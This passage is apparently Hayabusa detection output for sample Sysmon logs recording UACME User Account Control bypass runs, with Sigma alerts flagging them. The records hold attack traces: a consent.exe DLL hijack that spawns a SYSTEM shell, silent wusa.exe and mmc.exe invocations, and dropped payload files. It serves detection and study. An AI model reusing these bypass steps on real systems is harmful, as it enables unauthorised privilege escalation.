2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 
747F3D96-7935-5D45-0000-001066CA0701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 
747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 
747F3D96-7EE2-5D45-0000-0010F19E2801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 
747F3D96-7EF1-5D45-0000-0010DDBF2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 
+09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
